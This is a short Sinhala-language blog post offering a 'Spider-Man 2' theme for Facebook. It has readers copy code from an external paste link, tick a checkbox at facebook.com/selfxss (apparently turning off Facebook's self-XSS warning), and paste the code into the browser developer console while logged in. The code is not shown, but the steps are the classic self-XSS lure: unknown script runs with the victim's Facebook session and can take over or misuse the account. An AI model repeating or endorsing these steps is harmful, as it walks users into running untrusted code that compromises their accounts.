ඔන්න ඉතිම් මට කාලෙකට පස්සෙ සුපිරි ලිපියක් ලියන්න ලබුනා. අද අපි කතා කරන්නේ ඔයාලගෙ fb එකට SPIDER-MAN 2 THEME එක දාගන්න විදිය ගැන. හැබැයි මේක හැමදාම තියාගන්නනම් බැහැ
ඔයා ඉස්සෙල්ලම Google Chrome වලින් හරි Mozila Firefox වලින් හරි facebook log වෙන්න.
මිලින්ම ඔයා මේ ලෙන්ක් එකට ගිහිල්ලා මේ කෝඩ් එක කොපි කරගන්න.
http://textuploader.com/9kli
ඊටපස්සෙ මෙතන තියන ලින්ක් එක ක්ලික් කරන්න.
https://www.facebook.com/selfxss
ඊටපස්සෙ පොඩි ටැබ් එකක් එයි. එතන පල්ලෙහ පොඩි chek box එකක් තියනව එතනට ටික් එකක් දාන්න.
ඊටපස්සෙ මෙතන තියන ලින්ක් එක ක්ලික් කරන්න.
https://www.facebook.com/
ඔයා දැන් facebook log වෙලා ඉන්නෙ Google Chrome නම් Keyboard එකෙ Ctrl+Shift+J Press කරලා Console Box එකට Ctrl+v Press කරලා Code එක Paste කරලා Enter Button එක Press කරන්න :)
ඔයා දැන් facebook log වෙලා ඉන්නෙ Firefox නම් Ctrl+Shift+K Press කරලා Console Box එකට Copy කරගත්ත Code එක Ctrl+v Press කරලා Paste කර Enter Button එක Press කරන්න :)
ඊට පස්සෙ නිකන් ඉන්න. ටික වෙලාවකින් ඔයාගෙ ෆ්බ් එකට ලස්සනට theme එක වැටෙයි. ඔයාට ඕක අයින් කරගන්න ඕනෙ කියල හිතුනොත් කරන්න තියෙන්නෙ theme එක තියන page එකට ගිහිල්ල F5 key එක ඔබල Reload කරන එකයි.
එහෙනම් වැඩේ මෙතනින් ඉවරයි.එහෙනම් මම යනවා . /bye
මොකක් හරි ගැටලුවක් තියෙනවනම් Comment 1කක් දාලා යන්න. මෙ Script එක ගැන ඔයාලට හිතෙන අදහස් Comment එකක් විදිහට දාලා යන්න අමතක කරන්න එපා ඈ . සේරටම ජය වේවා...!! :)
මේ ගැන ඔයාලගෙ අදහස් මොනවද?
0 comment:
Post a Comment